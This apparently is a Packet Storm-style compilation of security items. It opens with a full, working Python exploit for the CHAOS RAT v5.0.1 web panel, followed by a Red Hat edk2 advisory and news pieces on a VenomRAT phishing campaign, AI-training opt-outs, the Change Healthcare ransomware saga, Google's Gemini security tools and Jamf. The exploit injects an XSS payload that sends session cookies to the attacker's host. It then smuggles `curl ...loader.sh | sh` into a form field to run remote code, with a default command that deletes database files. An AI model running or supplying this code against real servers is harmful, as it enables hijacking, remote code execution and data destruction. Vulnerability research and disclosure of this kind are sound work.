CHAOS RAT web panel version 5.0.1 is vulnerable to command injection, which can be triggered from a cross site scripting attack, allowing an attacker to takeover the RAT server.

    # Exploit Title: CHAOS RAT v5.0.1 RCE# Date: 2024-04-05# Exploit Author: @_chebuya# Software Link: https://github.com/tiagorlampert/CHAOS# Version: v5.0.1 # Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-30850, CVE-2024-31839# Description: The CHAOS RAT web panel is vulnerable to command injection, which can be triggered from an XSS, allowing an attacker to takeover the RAT server# Github: https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc# Blog: https://blog.chebuya.com/posts/remote-code-execution-on-chaos-rat-via-spoofed-agents/import timeimport requestsimport threadingimport jsonimport websocketimport http.clientimport argparseimport sysimport refrom functools import partialfrom http.server import BaseHTTPRequestHandler, HTTPServerclass Collector(BaseHTTPRequestHandler):    def __init__(self, ip, port, target, command, video_name, *args, **kwargs):        self.ip = ip        self.port = port        self.target = target        self.shell_command = command        self.video_name = video_name         super().__init__(*args, **kwargs)    def do_GET(self):        if self.path == "/loader.sh":            self.send_response(200)            self.end_headers()            command = str.encode(self.shell_command)            self.wfile.write(command)        elif self.path == "/video.mp4":            with open(self.video_name, 'rb') as f:                self.send_response(200)                self.send_header('Content-type', 'video/mp4')                self.end_headers()                self.wfile.write(f.read())        else:            cookie = self.path.split("=")[1]            self.send_response(200)            self.end_headers()            self.wfile.write(b"")            background_thread = threading.Thread(target=run_exploit, args=(cookie, self.target, self.ip, self.port))            background_thread.start()def convert_to_int_array(string):    int_array = []    for char in string:        int_array.append(ord(char))    return int_arraydef extract_client_info(path):    with open(path, 'rb') as f:        data = str(f.read())    address_regexp = r"main\.ServerAddress=(?:[0-9]{1,3}\.){3}[0-9]{1,3}"    address_pattern = re.compile(address_regexp)    address = address_pattern.findall(data)[0].split("=")[1]    port_regexp = r"main\.Port=\d{1,6}"    port_pattern = re.compile(port_regexp)    port = port_pattern.findall(data)[0].split("=")[1]    jwt_regexp = r"main\.Token=[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*"    jwt_pattern = re.compile(jwt_regexp)    jwt = jwt_pattern.findall(data)[0].split("=")[1]    return f"{address}:{port}", jwtdef keep_connection(target, cookie, hostname, username, os_name, mac, ip):    print("Spoofing agent connection")    headers = {            "Cookie": f"jwt={cookie}"    }    while True:        data = {"hostname": hostname, "username":username,"user_id": username,"os_name": os_name, "os_arch":"amd64", "mac_address": mac, "local_ip_address": ip, "port":"8000", "fetched_unix":int(time.time())}        r = requests.get(f"http://{target}/health", headers=headers)        r = requests.post(f"http://{target}/device", headers=headers, json=data)        time.sleep(30)def handle_command(target, cookie, mac, ip, port):    print("Waiting to serve malicious command outupt")    headers = {        "Cookie": f"jwt={cookie}",        "X-Client": mac    }    ws = websocket.WebSocket()    ws.connect(f'ws://{target}/client', header=headers)    while True:        response = ws.recv()        command = json.loads(response)['command']        data = {"client_id": mac, "response": convert_to_int_array(f"</pre><script>var i = new Image;i.src='http://{ip}:{port}/'+document.cookie;</script><video loop controls autoplay><source src=\"http://{ip}:{port}/video.mp4\" type=\"video/mp4\"></video>"), "has_error": False}        ws.send_binary(json.dumps(data))def run_exploit(cookie, target, ip, port):    print(f"Exploiting {target} with JWT {cookie}")    conn = http.client.HTTPConnection(target)    headers = {        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',        'Content-Type': 'multipart/form-data; boundary=---------------------------196428912119225031262745068932',        'Cookie': f'jwt={cookie}'    }    conn.request(        'POST',        '/generate',        f'-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="address"\r\n\r\nhttp://localhost\'$(IFS=];b=curl]{ip}:{port}/loader.sh;$b|sh)\'\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="port"\r\n\r\n8080\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="os_target"\r\n\r\n1\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="filename"\r\n\r\n\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="run_hidden"\r\n\r\nfalse\r\n-----------------------------196428912119225031262745068932--\r\n',        headers    )def run(ip, port, target, command, video_name):    server_address = (ip, int(port))    collector = partial(Collector, ip, port, target, command, video_name)    httpd = HTTPServer(server_address, collector)    print(f'Server running on port {ip}:{port}')    httpd.serve_forever()if __name__ == "__main__":    parser = argparse.ArgumentParser()    subparsers = parser.add_subparsers(dest="option")    exploit = subparsers.add_parser("exploit")    exploit.add_argument("-f", "--file",  help="The path to the CHAOS client")    exploit.add_argument("-t", "--target", help="The url of the CHAOS server (127.0.0.1:8080)")    exploit.add_argument("-c", "--command", help="The command to use", default=r"find / -name chaos.db -exec rm -f {} \;")    exploit.add_argument("-v", "--video-name", help="The video name to use", default="rickroll.mp4")    exploit.add_argument("-j", "--jwt", help="The JWT token to use")    exploit.add_argument("-l", "--local-ip", help="The local IP to use for serving bash script and mp4", required=True)    exploit.add_argument("-p", "--local-port", help="The local port to use for serving bash script and mp4", default=8000)    exploit.add_argument("-H", "--hostname", help="The hostname to use for the spoofed client", default="DC01")    exploit.add_argument("-u", "--username", help="The username to use for the spoofed client", default="Administrator")    exploit.add_argument("-o", "--os", help="The OS to use for the spoofed client", default="Windows")    exploit.add_argument("-m", "--mac", help="The MAC address to use for the spoofed client", default="3f:72:58:91:56:56")    exploit.add_argument("-i", "--ip", help="The IP address to use for the spoofed client", default="10.0.17.12")    extract = subparsers.add_parser("extract")    extract.add_argument("-f", "--file", help="The path to the CHAOS client", required=True)    args = parser.parse_args()    if args.option == "exploit":        if args.target != None and args.jwt != None:            target = args.target            jwt = args.jwt        elif args.file != None:            target, jwt = extract_client_info(args.file)        else:            exploit.print_help(sys.stderr)            sys.exit(1)        bg = threading.Thread(target=keep_connection, args=(target, jwt, args.hostname, args.username, args.os, args.mac, args.ip))        bg.start()        cmd = threading.Thread(target=handle_command, args=(target, jwt, args.mac, args.local_ip, args.local_port))        cmd.start()        server = threading.Thread(target=run, args=(args.local_ip, args.local_port, target, args.command, args.video_name))        server.start()    elif args.option == "extract":        target, jwt = extract_client_info(args.file)        print(f"CHAOS server: {target}\nJWT: {jwt}")    else:        parser.print_help(sys.stderr)        sys.exit(1)

CHAOS RAT 5.0.1 Remote Command Execution

Red Hat Security Advisory 2024-1722-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.2 Telecommunications Update Service. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1722.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:1722-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1722Issue date:         2024-04-09Revision:           03CVE Names:          CVE-2023-45234====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.2 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM.Security Fix(es):* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45234References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258697

Red Hat Security Advisory 2024-1722-03

Various anti-detection features, including the use of the ScrubCrypt antivirus-evasion tool, fuel an attack that aims to take over Microsoft Windows machines.

Source: Shane in Sweden via Shutterstock

A newly exposed corporate phishing campaign targeting Microsoft Windows users is delivering a flurry of remote access Trojans (RATs) and other malware under the cover of multiple detection-evasion techniques.

The attackers behind the campaign try to lure users into clicking on an attachment that ultimately employs the tool ScrubCrypt to deliver primarily the VenomRAT version 6, although various other oft-used malware also are associated with the campaign, researchers from Fortinet's FortiGuard Labs Threat Research revealed in a blog post.

While the RAT maintains a connection with attackers' command-and-control (C2) server, the attack drops plug-ins including Remcos RAT, XWorm, NanoCore RAT, and a stealer designed for specific crypto wallets, according to the researchers.

Ultimately the campaign is aimed at stealing critical data from targeted systems — ostensibly to be used in future attacks — as well achieving persistence on a victim's network, according to the post.

"The attackers employ a variety of methods, including phishing emails with malicious attachments, obfuscated script files, and Guloader PowerShell, to infiltrate and compromise victim systems," wrote Cara Lin, senior antivirus analyst at Fortinet. "Furthermore, deploying plugins through different payloads highlights the versatility and adaptability of the attack campaign."

VenomRAT is a tool used previously by the 8220 Gang, a cybercriminal group that uses a powerful botnet as its weapon of choice. ScrubCrypt, meanwhile, converts executables into undetectable batch files, providing "several options to manipulate malware, making it more challenging for antivirus products to detect," Lin noted.

**Phony Invoice Phish**

The campaign typically starts with a phishing email stating that a shipment has been delivered with an attached "invoice" that is actually an SVG file named "INV0ICE\_#TBSBVS0Y3BDSMMX.svg" and contains embedded base64-encoded data.

If a targeted user opens the SVG file, the ECMAScript creates a new blob and utilizes "window.URL.createObjectURL" to drop the decoded data as a ZIP file named "INV0ICE\_#TBSBVS0Y3BDSMMX.zip." The decompressed file reveals an obfuscated batch file with an embedded payload that appears to be created by the BatCloak tool, which distributes malware while effectively evading detection by antivirus program, Lin explained.

The embedded script initially copies a PowerShell execution file to "C:\\Users\\Public\\xkn.exe" and utilizes the copied file in later commands, using parameters that conceal its activity. It then decodes the malicious data and saves it as "pointer.png," which is later executed as "pointer.cmd" and deletes all the previously executed files.

**ScrubCrypt Delivers VenomRAT**

The "pointer.cmd" file serves as the ScrubCrypt batch file, and it's "deliberately cluttered with numerous junk strings to obscure readability," Lin wrote. The file incorporates two payloads, the first of which serves two primary purposes: establishing persistence and loading the targeted malware, VenomRAT. The second payload from the ScrubCrypt batch file is for AMSI bypass and ETW bypass, she noted.

VenomRAT was first identified in 2020 and uses a modified version of the well-known Quasar RAT. It allows attackers to gain unauthorized access and control over targeted systems. "As with other RATs, VenomRAT enables attackers to manipulate compromised devices remotely, allowing them to execute various malicious activities without the victim's knowledge or consent," Lin wrote.

Once deployed, VenomRAT initiates communication with its C2 server to send information about the victim, such as hardware specifications, username, operating system details, camera availability, execution path, foreground window name, and the name of the antivirus product installed. It then maintains communication channels with the C2 server to acquire the aforementioned additional plugins for related and other malicious activities as the attack continues from there, Lin wrote.

Notable among those plugins are three RATs often used for various nefarious purposes, including the Remcos RAT, which gives attackers complete system control to capture keystrokes, screenshots, credentials, and other sensitive information; NanoCore RAT, which can remotely access and control a victim's computer; and Xworm, which can load ransomware or act as a persistent backdoor.

**Vigilance Required**

Because this cyberattack campaign uses multiple layers of obfuscation and evasion techniques, it's important for enterprises to stay vigilant.

"The attackers' ability to persist in the system, evade detection, and execute malicious payloads underscores the importance of robust cybersecurity measures and vigilant monitoring to mitigate such threats effectively," Lin noted.

Organizations should educate users about the hallmark signs of phishing campaigns and encourage them to report suspicious activity to IT departments, as well as avoid downloading files or clicking on links from untrusted sources.

Despite its evasive tactics, a strong antivirus-detection system should pick up the malware entering a network, and one that includes a content disarm-and-reconstruction service also is helpful to disable the malicious macros in the document before they can do any harm, Lin wrote.

Fortiguard included a list of indicators of compromise for the specific VenomRAT campaign in the post, including associated C2 domains, URLs associated with the attack, and files the attack distributes.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Cagey Phishing Campaign Delivers Multiple RATs to Steal Windows Data

Some companies let you opt out of allowing your content to be used for generative AI. Here’s how to take back (at least a little) control from ChatGPT, Google’s Gemini, and more.

If you’ve ever posted something to the internet—a pithy tweet, a 2009 blog post, a scornful review, or a selfie on Instagram—it has most likely been slurped up and used to help train the current wave of generative AI. Large language models, like ChatGPT, and image creators are powered by vast reams of our data. And even if it’s not powering a chatbot, the data can be used for other machine-learning features.

Tech companies have scraped vast swathes of the web to gather the data they claim is needed to create generative AI—with little regard for content creators, copyright laws, or privacy. On top of this, increasingly, firms with reams of people’s posts are looking to get in on the AI gold rush by selling or licensing that information. Looking at you, Reddit.

However, as the lawsuits and investigations around generative AI and its opaque data practices pile up, there have been small moves to give people more control over what happens to what they post online. Some companies now let individuals and business customers opt out of having their content used in AI training or being sold for training purposes. Here’s what you can—and can’t—do.

**There’s a Limit**

Before we get to how you can opt out, it’s worth setting some expectations. Many companies building AI have already scraped the web, so anything you’ve posted is probably already in their systems. Companies are also secretive about what they have actually scraped, purchased, or used to train their systems. “We honestly don't know that much,” says Niloofar Mireshghallah, a researcher who focuses on AI privacy at the University of Washington. “In general, everything is very black-box.”

Mireshghallah explains that companies can make it complicated to opt out of having data used for AI training, and even where it is possible, many people don’t have a “clear idea” about the permissions they’ve agreed to or how data is being used. That’s before various laws, such as copyright protections and Europe’s strong privacy laws, are taken into consideration. Facebook, Google, X, and other companies have written into their privacy policies that they may use your data to train AI.

While there are various technical ways AI systems could have data removed from them or “unlearn,” Mireshghallah says, there’s very little that’s known about the processes that are in place. The options can be buried or labor-intensive. Getting posts removed from AI training data is likely to be an uphill battle. Where companies are starting to allow opt-outs for future scraping or data sharing, they are almost always making users opt-in by default.

“Most companies add the friction because they know that people aren’t going to go looking for it,” says Thorin Klosowski, a security and privacy activist at the Electronic Frontier Foundation. “Opt-in would be a purposeful action, as opposed to opting out, where you have to know it’s there.”

While less common, some companies building AI tools and machine learning models don't automatically opt-in customers. “We do not train our models on user-submitted data by default. We may use user prompts and outputs to train Claude where the user gives us express permission to do so, such as clicking a thumbs up or down signal on a specific Claude output to provide us feedback,” says Jennifer Martinez, a spokesperson for Anthropic. In this situation, the most recent iteration of the company’s Claude chatbot is built on public information online and third-party data—content people posted elsewhere online—but not user information.

The majority of this guide deals with opt-outs for text, but artists have also been using “Have I Been Trained?” to signal their images shouldn't be used for training. Run by startup Spawning, the service allows people to see if their creations have been scraped and then opt out of any future training. “Anything with a URL can be opted out. Our search engine only searches images, but our browser extension lets you opt out any media type,” says Jordan Meyer, cofounder and CEO of Spawning. Stability AI, the startup behind a text-to-image tool called Stable Diffusion, is among companies that say they are honoring the system.

The list below only includes companies currently with an opt-out process. For example, Microsoft’s Copilot does not offer users with personal accounts the option to have their prompts not used to improve the software. “A portion of the total number of user prompts in Copilot and Copilot Pro responses are used to fine-tune the experience,” says Donny Turnbaugh, a spokesperson for Copilot. “Microsoft takes steps to deidentify data before it is used, helping to protect consumer identity.” Even if the data is deidentified, privacy-minded users may want more potential control over their information.

**How to Opt Out of AI Training**

Adobe

Adobe via Matt Burgess

If you store your files in Adobe’s Creative Cloud, the company may use them to train its machine-learning algorithm. “When we analyze your content for product improvement and development purposes, we first aggregate your content with other content and then use the aggregated content to train our algorithms and thus improve our products and services,” reads the company’s FAQ. This doesn’t apply to any files stored only on your device.

If you’re using a personal Adobe account, it’s easy to opt out. Open up Adobe’s **privacy page**, scroll down to the **Content analysis** section, and click the toggle to turn it off. For business or school accounts, the opt-out process is not available on the individual level, and you’ll have to reach out to your administrator.

Amazon: AWS

AI services from Amazon Web Services, like Amazon Rekognition or Amazon CodeWhisperer, may save customer data to improve the company’s tools. Head’s up, this is the most complicated opt-out process included in the roundup, so you likely need help from an IT professional at your company or an AWS representative to perform it successfully. Outlined on this support page from Amazon, the process includes enabling the option for your organization, creating a policy, and attaching that policy where necessary.

Google: Gemini

For users of Google’s chatbot, Gemini, conversations may sometimes be selected for human review to improve the AI model. Opting out is simple, though. Open up Gemini in your browser, click on **Activity**, and select the **Turn Off** drop-down menu. Here you can just turn off the Gemini Apps Activity, or you can opt out as well as delete your conversation data. While this does mean in most cases that future chats won’t be seen for human review, already selected data is not erased through this process. According to Google’s privacy hub for Gemini, these chats may stick around for three years.

Grammarly

Grammarly does not currently offer an opt-out process for personal accounts, but self-serve business accounts can choose to opt out from having their data used to train Grammarly’s machine-learning model. Turn it off by opening up your **Account Settings**, clicking on the **Data Settings** tab, and toggling off **Product Improvement & Training**. If you have a managed business account, which includes accounts for classroom education and accounts bought through a Grammarly sales representative, you are automatically opted out from AI model training.

HubSpot

HubSpot, a popular marketing software, automatically uses data from customers to improve its machine-learning model. Unfortunately, there’s not a button to press to turn off the use of data for AI training. You have to **send an email** to privacy@hubspot.com with a message requesting that the data associated with your account be opted out.

OpenAI: ChatGPT and Dall-E

OpenAI via Matt Burgess

People reveal all sorts of personal information while using a chatbot. OpenAI provides some options for what happens to what you say to ChatGPT—including allowing its future AI models not to be trained on the content. “We give users a number of easily accessible ways to control their data, including self-service tools to access, export, and delete personal information through ChatGPT. That includes easily accessible options to opt out from the use of their content to train models,” says Taya Christianson, an OpenAI spokesperson. (The options vary slightly depending on your account type, and data from enterprise customers is not used to train models).

On its help pages, OpenAI says ChatGPT web users without accounts should navigate to **Settings** and then uncheck **Improve the model for everyone**. If you have an account and are logged in through a web browser, select **ChatGPT, Settings, Data Controls,** and then turn off **Chat History & Training**. If you’re using ChatGPT’s mobile apps, go to **Settings**, pick **Data Controls,** and turn off **Chat History & Training**. Changing these settings, OpenAI’s support pages say, won’t sync across different browsers or devices, so you need to make the change everywhere you use ChatGPT.

OpenAI is about a lot more than ChatGPT. For its Dall-E 3 image generator, the startup has a **form that allows you to send images** to be removed from “future training datasets.” It asks for your name, email, whether you own the image rights or are getting in touch on behalf of a company, details of the image, and any uploads of the image(s). OpenAI also says if you have a “high volume” of images hosted online that you want removed from training data, then it may be “more efficient” to add GPTBot to the robots.txt file of the website where the images are hosted.

Traditionally a website’s robots.txt file—a simple text file that usually sits at websitename.com/robots.txt—has been used to tell search engines, and others, whether they can include your pages in their results. It can now also be used to tell AI crawlers not to scrape what you have published—and AI companies have said they’ll honor this arrangement.

Perplexity

Perplexity is a startup that uses AI to help you search the web and find answers to questions. Like all of the other software on this list, you are automatically opted in to having your interactions and data used to train Perplexity’s AI further. Turn this off by clicking on your **account name**, scrolling down to the **Account** section, and turning off the **AI Data Retention** toggle.

Quora

Quora via Matt Burgess

Quora says it “currently” doesn’t use answers to people’s questions, posts, or comments for training AI. It also hasn’t sold any user data for AI training, a spokesperson says. However, it does offer opt-outs in case this changes in the future. To do this, visit its **Settings** page, click to **Privacy,** and turn off the “**Allow large language models to be trained on your content**” option. Despite this choice, there are some Quora posts that may be used for training LLMs. If you reply to a machine-generated answer, the company’s help pages say, then those answers may be used for AI training. It points out that third parties may just scrape its content anyway.

Rev

Rev, a voice transcription service that uses both human freelancers and AI to transcribe audio, says it uses data “perpetually” and “anonymously” to train its AI systems. Even if you delete your account, it will still train its AI on that information.

Kendell Kelton, head of brand and corporate communications at Rev, says it has the “largest and most diverse data set of voices,” made up of more than 6.5 million hours of voice recording. Kelton says Rev does not sell user data to any third parties. The firm’s terms of service say data will be used for training, and that customers are able to opt out. People can opt out of their data being used by **sending an email** to support@rev.com, its help pages say.

Slack

All of those random Slack messages at work might be used by the company to train its models as well. “Slack has used machine learning in its product for many years. This includes platform-level machine-learning models for things like channel and emoji recommendations,” says Jackie Rocca, a vice president of product at Slack who’s focused on AI.

Even though the company does not use customer data to train a large language model for its Slack AI product, Slack may use your interactions to improve the software’s machine-learning capabilities. “To develop AI/ML models, our systems analyze Customer Data (e.g. messages, content, and files) submitted to Slack,” says Slack’s privacy page. Similar to Adobe, there’s not much you can do on an individual level to opt out if you’re using an enterprise account.

The only real way to opt out is to have your administrator email Slack at feedback@slack.com. The message must have the subject line “Slack Global model opt-out request” and include your organization's URL. Slack doesn’t provide a timeline for how long the opt-out process takes, but it should send you a confirmation email after it’s complete.

Squarespace

Website-building tool Squarespace has built in a toggle to stop AI crawlers from scraping websites it hosts. This works by updating your website’s robots.txt file to tell AI companies the content is off limits. To block the AI bots, open **Settings** within your account, find **Crawlers**, and turn off **Artificial Intelligence Crawlers**. It points out this should work for the following crawlers: Anthropic, OpenAI’s GPTBot and ChatGPT-User, Google Extended, and CCBot.

Substack

If you use Substack for blog posts, newsletters, or more, the company also has an easy option to apply the robots.txt opt-out. Within your **Settings** page, scroll to the **Publication** section and turn on the toggle to **Block AI training**. Its help page points out: “This will only apply to AI tools that respect this setting.”

Tumblr

Blogging and publishing platform Tumblr—owned by Automattic, which also owns WordPress—says it is “working with” AI companies that are “interested in the very large and unique set of publicly published content” on the wider company’s platforms. This doesn’t include user emails or private content, an Automattic spokesperson says.

Tumblr has a “prevent third-party sharing” option to stop what you publish being used for AI training, as well as being shared with other third parties such as researchers. If you’re using the Tumblr app, go to account S**ettings**, select your blog, click on the **gear icon**, select **Visibility**, and toggle the “**Prevent third-party sharing**” option. Explicit posts, deleted blogs, and those that are password-protected or private, are not shared with third-party companies in any case, Tumblr’s support pages say.

WordPress

Wordpress via Matt Burgess

Like Tumblr, WordPress has a “prevent third-party sharing” option. To turn this on, visit your website’s dashboard, click on **Settings**, **General**, and then through to **Privacy**, select the **Prevent third-party sharing** box. “We are also trying to work with crawlers (like https://commoncrawl.org/) to prevent content from being scraped and sold without giving our users choice or control over how their content is used,” an Automattic spokesperson says.

Your Website

If you are hosting your own website, you can update your robots.txt file to tell AI bots not to scrape the pages. Most news websites don’t allow their articles to be crawled by AI bots. WIRED’s robots.txt file, for example, doesn’t allow bots from OpenAI, Google, Amazon, Facebook, Anthropic, or Perplexity, among others. This opt-out isn’t just for publishers though: Any website, big or small, can alter its robots file to exclude AI crawlers. All you need to do is add a disallow command; working examples can be found here.

How to Stop Your Data From Being Used to Train AI

The Change Healthcare ransomware attack as suffered a third cruel twist.

The Change Healthcare ransomware attack has taken a third cruel twist. A new ransomware group, RansomHub, has listed the organisation as a victim on its dark web leak site, saying it has 4 TB of “highly selective data,” which relates to “all Change Health clients that have sensitive data being processed by the company.”

The announcement follows a series of events that require some unpacking.

Change Healthcare is one of the largest healthcare technology companies in the USA, responsible for the flow of payments between payers, providers, and patients. It was attacked on Wednesday February 21, 2024, by a criminal “affiliate” working with the ALPHV ransomware group, which led to huge disruptions in healthcare payments. Patients were left facing enormous pharmacy bills, small medical providers teetered on the edge of insolvency, and the government scrambled to keep the money flowing and the lights on.

American Hospital Association (AHA) President and CEO Rick Pollack described the attack as “the most significant and consequential incident of its kind against the US health care system in history.”

The notorious ALPHV ransomware group claimed responsibility, chalking up Change Healthcare as one of a raft of healthcare victims in what looked like a deliberate campaign against the sector at the start of 2024.

ALPHV used the ransomware-as-a-service (RaaS) business model, selling the software and infrastructure used to carry out ransomware attacks to criminal gangs known as affiliates, in return for a share of the ransoms they extorted.

On March 3, a user on the RAMP dark web forum claimed they were the affiliate behind the attack, and that ALPHV had stolen the entirety of a $22 million ransom paid by Change Healthcare. Shortly after, the ALPHV group disappeared in an unconvincing exit scam designed to make it look as if the group’s website had been seized by the FBI.

ALPHV’s exit left Change Healthcare with nothing to show for its $22 million payment, a disgruntled affiliate looking for a ransom, and very possibly two different criminal gangs—ALPHV and its affiliate—in possession of a huge trove of stolen data.

Now, a month later, a newcomer ransomware group, RansomHub has listed Change Healthcare as a victim on its website.

Change Healthcare is listed as a victim on the RansomHub dark web leak site

While some have speculated that Change Healthcare has suffered a second attack, the RansomHub site itself makes the connection to the events surrounding February 21 quite clear:

> As an introduction we will give everyone a fast update on what happened previously and on the current situation.
> 
> ALPHV stole the ransom payment (22 Million USD) that Change Healthcare and United Health payed in order to restore their systems and prevent the data leak.
> 
> HOWEVER we have the data and not ALPHV.

RansomHub first appeared in late February and its arrival dovetails neatly with ALPHV’s disappearance in very early March, leading some to think they are the same group under two different names.

The statement also pours water on the idea that RansomHub is a rebrand of the ALPHV group with its suggestion that “we have the data and not ALPHV.” However, any public statement like this has to be tempered by the fact that ransomware groups are prolific liars.

It’s not uncommon for affiliates to work with multiple RaaS providers, so the most likely explanation is that having lost its money to ALPHV, the affiliate that ransacked Change Healthcare has paired up with a different ransomware group.

Whatever the reason, there is no comfort in it for Change Healthcare. Having apparently already paid a ransom thirty times greater than the average demand, it now has to decide whether it’s going to pay out again.

For everyone else, it’s a lesson in how devastating ransomware can be, and how badly things can go even when you pay a ransom.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like ThreatDown EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 New ransomware group demands Change Healthcare ransom 

Google has integrated Mandiant's security offerings into its AI platform to detect, stop, and remediate cybersecurity attacks as quickly as possible.

Source: Klaus Ohlenschlaeger via Alamy Stock Photo

Gemini now has security capabilities: Google has integrated Mandiant's security offerings into its artificial intelligence (AI) platform, the company announced during its Google Cloud Next conference in Las Vegas.

The new capabilities are automated security agents that use generative AI to detect, stop, and remediate cybersecurity attacks as quickly as possible and to to analyze code to find security problems. The agents will assist security operations teams by increasing the speed of investigations.

"Security agents will help you in every stage of the security life cycle, from prevention, detection and response," said Google Cloud CEO Thomas Kurian during a keynote speech at the event.

The security offerings are built around Google's Gemini large language model, which is also being used to summarize documents and generate images. The new security features use generative AI to analyze code to find security problems. Security analysts can run deep queries to get to the root cause of problems and seek answers. The technology will also better explain findings so companies can take action to neutralize threats.

Google is betting its future on AI products such as Gemini, which it introduced earlier this year. Gemini is already being integrated into search and productivity applications. Mandiant's offerings include threat detection and security operations, and Gemini adds AI capabilities to cover detection, analysis, and prevention.

**Using AI to Understand Attacks**

One of the new products, Gemini in Threat Intelligence, uses natural language prompts to get deep insight about malicious behavior.

"We're able to take the experience and intelligence we gather from protecting Google's own services, combine it with Mandiant's leading, frontline insight from their work in incident response to show emerging threats, the severity, and risk factors," Kurian said.

The intelligent threat offers ties into the next product, Gemini in Security Operations, which relies on AI to improve the speed to address threats from malicious behavior. It can also be used to summarize and explain findings, recommend next steps, and put remediation playbooks in action.

Gemini can recommend actions based on factors such as detection rules, and provide recommendations for faster response times.

"Analysts can now ask Gemini for the latest threat intelligence from Mandiant directly in-line — including any indicators of compromise found in their environment — and Gemini will navigate users to the most relevant pages in the integrated platform for deeper investigation," Google wrote in a blog post.

The offering uses Gemini 1.5 Pro's AI capabilities to analyze large samples of potential malicious code or malware, the interaction between modules, and to reveal their true malicious intent, Kurian said.

The final product announced was Gemini in Security Command Center, which evaluates a security posture, provides findings, and summarizes attack paths, which helps companies remediate cloud risks.

"We've leveraged tremendous amounts of machine learning, precision AI, generative AI, to make sure our customers are able to detect, stop, and remediate all cybersecurity attacks as quickly as possible," Kurian said.

AI tools such as Gemini and OpenAI's ChatGPT are improving productivity, but hallucinations and other shortcomings are raising concerns about the technology being used irresponsibly. The White House late last month issued an executive order on responsible use and development of AI development, which also recommends monitoring AI systems to prevent misuse.

**About the Author(s)**

Agam Shah has covered enterprise IT for more than a decade. Outside of machine learning, hardware, and chips, he's also interested in martial arts and Russia.

Google Gives Gemini a Security Boost

The device management company introduced a Fleet Hardening Score and Privilege Escalation (the good kind) to its endpoint security platform for Apple devices.

Source: baosheng feng via Alamy Stock Photo

Enterprise IT teams responsible for managing Macs and iOS devices are getting new compliance and security tools, device management company Jamf said during its Spring Event. A new capability in Jamf Connect allows the granting of temporary administrative privileges to a local Mac user. That activity data feeds Jamf Protect, which has added a compliance dashboard that presents overall fleet compliance and drills down to individual devices.

Jamf Connect creates a cloud-based identity for each user that, when authenticated, allows them to set up access to the tools and applications they need via VPN. The new feature, Privilege Escalation, temporarily grants end users elevated administrator privileges to perform tasks such as updating device drivers, installing printers, and adding software that's not managed by Self-Service. Once the time IT set for the escalated privileges expires, the user automatically defaults back to the standard user role.

Jamf has also added a compliance dashboard to Jamf Protect, which provides anti-malware tools, threat defense, and metrics for a fleet of macOS and iOS devices. From the dashboard, an administrator can view which devices fall out of compliance with guidelines; update any software, including the OS version, that needs it; and quarantine suspect files automatically. The new Fleet Hardening Score in Jamf Protect is an aggregate baseline score quantifying the organization's overall endpoint security posture. Administrators can drill down to individual devices to understand and remediate issues.

The integration between Jamf Connect and Jamf Protect provides administrators with detailed telemetry about the privileged tasks being performed on the device. Administrators can use the telemetry to audit endpoints and as part of intrusion detection and response.

